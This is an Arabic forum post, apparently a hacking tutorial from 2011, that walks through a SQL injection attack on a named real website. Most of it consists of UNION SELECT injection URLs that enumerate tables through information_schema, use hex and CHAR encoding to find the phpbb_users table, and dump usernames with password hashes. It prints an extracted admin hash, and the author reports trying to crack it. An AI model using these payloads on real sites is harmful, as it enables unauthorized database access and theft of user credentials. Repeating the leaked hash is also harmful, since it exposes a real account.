http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns--
تمام باقي علينا لباسبودWhere+column_name+LIKE باس مشفرة من فيرفوكس
الظاهر انك تعرف كيف تجيبه
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
تلاحظ ان في الحقنه موجودGroup_ وهي تعرض الجميع لي في الجدوال
وطلع لك جميع لي في الجدوال وتبحث فيهم واحد واحد خينا ناخذ واحد منهو مثل phpbb_users
نشفيرها الموقع هذا وهو من الاساسيات
كود PHP:
http://www.waraxe.us/sql-char-encoder.html
ممكن انك تعرف الموقع كيف يستخدام اذكانت ماتعرف قولي واحسن شي انك التابع الدورة sql في المنتدي وتركز فيها
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+table_name=0x70687062625f7573657273--
طلعتلك الستا تجرب فيهم علما user_id عضو مافي فائدة منه تبحث عن الباسورد او اليوز نيم من هذا قبيل
خلينا ناخذ واحد منهم username+user_password
يصبح الرابط
كود PHP:
http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(username,0x3a,user_password),3,4,5+from+phpbb_users--
admin:61b19b269cc521c8e15bbadb4dfe49a7
انا حولت فك الباس ولكن ما فك معي
:a14: والله طلع من الاختبارات وكتبت الموضوع وانااسف على التاخير يا غالي
في النهاية تتركك في فمان الرحمن ولكن كم اقولك تابع الدورة في المنتدي وركز عليه
تقييم
التعديل الأخير تم بواسطة خالد سعودي ; 01-23-2011 الساعة 01:42 PM.
01-23-2011, 01:35 PM
العرض المتطور
